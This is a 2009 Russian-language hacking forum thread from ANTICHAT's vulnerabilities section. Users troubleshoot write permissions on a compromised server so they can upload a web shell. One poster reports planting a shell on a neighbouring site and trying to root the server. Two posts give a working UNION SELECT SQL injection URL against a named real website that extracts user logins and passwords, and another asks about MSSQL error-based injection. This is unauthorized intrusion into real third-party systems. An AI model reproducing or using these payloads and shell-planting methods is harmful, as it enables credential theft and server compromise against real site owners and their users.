HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.11.2009, 17:15
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

Цитата:
Сообщение от geezer.code  
bons, а что показывает df и cat /etc/fstab?
df -h:
Код:
  Filesystem            Size  Used Avail Use% Mounted on
/dev/sda6             5.7G  3.9G  1.6G  71% /
/dev/sda5             9.7G  952M  8.2G  11% /home
/dev/sda2              34G  8.4G   24G  27% /var
/dev/sda3              24G  3.3G   20G  15% /opt
/dev/sda9              66G  2.0G   61G   4% /usr
/dev/sda1             107M   37M   65M  37% /boot
tmpfs                 502M     0  502M   0% /dev/shm
cat /etc/fstab:
Код:
 LABEL=/                 /                       ext3    defaults        1 1
LABEL=/home             /home                   ext3    defaults        1 2
LABEL=/var              /var                    ext3    defaults        1 2
LABEL=/opt              /opt                    ext3    defaults        1 2
LABEL=/usr              /usr                    ext3    defaults        1 2
LABEL=/tmp              /tmp                    ext3    defaults, noexec  1 2
LABEL=/boot             /boot                   ext3    defaults        1 2
tmpfs                   /dev/shm                tmpfs   defaults        0 0
devpts                  /dev/pts                devpts  gid=5,mode=620  0 0
sysfs                   /sys                    sysfs   defaults        0 0
proc                    /proc                   proc    defaults        0 0
/dev/sda8               swap                    swap    defaults        0 0
уже отмечал, что места хватает,
смонтирован вроде без особых нюансов
Цитата:
Сообщение от m0Hze  
2bons посмотри процессы,попробуй записать файл в /tmp/ ,затем mv в нужную директорию.Возможно так получиться.
из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.

Последний раз редактировалось bons; 14.11.2009 в 17:25..
 
Ответить с цитированием

  #2  
Старый 14.11.2009, 18:18
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от bons  
df -h:
Код:
  Filesystem            Size  Used Avail Use% Mounted on
/dev/sda6             5.7G  3.9G  1.6G  71% /
/dev/sda5             9.7G  952M  8.2G  11% /home
/dev/sda2              34G  8.4G   24G  27% /var
/dev/sda3              24G  3.3G   20G  15% /opt
/dev/sda9              66G  2.0G   61G   4% /usr
/dev/sda1             107M   37M   65M  37% /boot
tmpfs                 502M     0  502M   0% /dev/shm
cat /etc/fstab:
Код:
 LABEL=/                 /                       ext3    defaults        1 1
LABEL=/home             /home                   ext3    defaults        1 2
LABEL=/var              /var                    ext3    defaults        1 2
LABEL=/opt              /opt                    ext3    defaults        1 2
LABEL=/usr              /usr                    ext3    defaults        1 2
LABEL=/tmp              /tmp                    ext3    defaults, noexec  1 2
LABEL=/boot             /boot                   ext3    defaults        1 2
tmpfs                   /dev/shm                tmpfs   defaults        0 0
devpts                  /dev/pts                devpts  gid=5,mode=620  0 0
sysfs                   /sys                    sysfs   defaults        0 0
proc                    /proc                   proc    defaults        0 0
/dev/sda8               swap                    swap    defaults        0 0
уже отмечал, что места хватает,
смонтирован вроде без особых нюансов

из tmp файл не копируется. В процессах вроде как ничего подозрительного но не могу быть в этом уверен.
Интересная ситуация
А в других директориях копируеться,создаеться нормально? Таких как /tmp/ и подобные,с привилегией RWD? Тогда я бы искал альтернативу,шелл через логи,через сторонний сайт,поиск других директорий,или создание новых
 
Ответить с цитированием

  #3  
Старый 14.11.2009, 17:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

2 jokester:

Если зашел под рутом и доступно изменение БД mysql (для того, чтобы изменить права рута, иногда тупо оставляют рут доступ, но у рута (который же может и изменить эти права) отбирают права на некоторые функции) - в этом случае. Как на это влияет safe_mode - честно, не знаю.

PS: Сорри, читаю невнимательно, даже не понял про что речь шла, думал про заливку из phpmyadmin

Последний раз редактировалось Pashkela; 15.11.2009 в 15:42..
 
Ответить с цитированием

  #4  
Старый 14.11.2009, 18:52
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
Расскажи плз как можно расставить такие права
на andrew file system такие права можно поставить =)
bons, попробуй в /var/tmp/
 
Ответить с цитированием

  #5  
Старый 14.11.2009, 19:42
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

Почему-то, несмотря на то что права на данную папку и все файлы в ней rwxrwxrwx функция php is_writable говорит что прав на запись нет :/
Доп инфо: владелец файлов apache:apache, права у меня: uid=48(apache) gid=48(apache) groups=48(apache)

в общем-то шелл удалось залить на соседний сайт там таких проблем не возникло. Порутать серв не удалось несмотря на то что ядро обновлялось достаточно давно.
Вопрос про права в этой папке остается нерешенным.
 
Ответить с цитированием

  #6  
Старый 14.11.2009, 20:02
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию

Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:

К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights

бла бла бла..
 
Ответить с цитированием

  #7  
Старый 14.11.2009, 22:40
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами: 9555536

Репутация: 95
По умолчанию

почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--
 
Ответить с цитированием

  #8  
Старый 14.11.2009, 22:50
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+
 
Ответить с цитированием

  #9  
Старый 15.11.2009, 18:08
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами: 9336002

Репутация: 204
По умолчанию

Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.
 
Ответить с цитированием

  #10  
Старый 15.11.2009, 21:24
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

есть sqli на mssql,
Цитата:
надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает

Последний раз редактировалось YuNi|[c; 15.11.2009 в 21:28..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...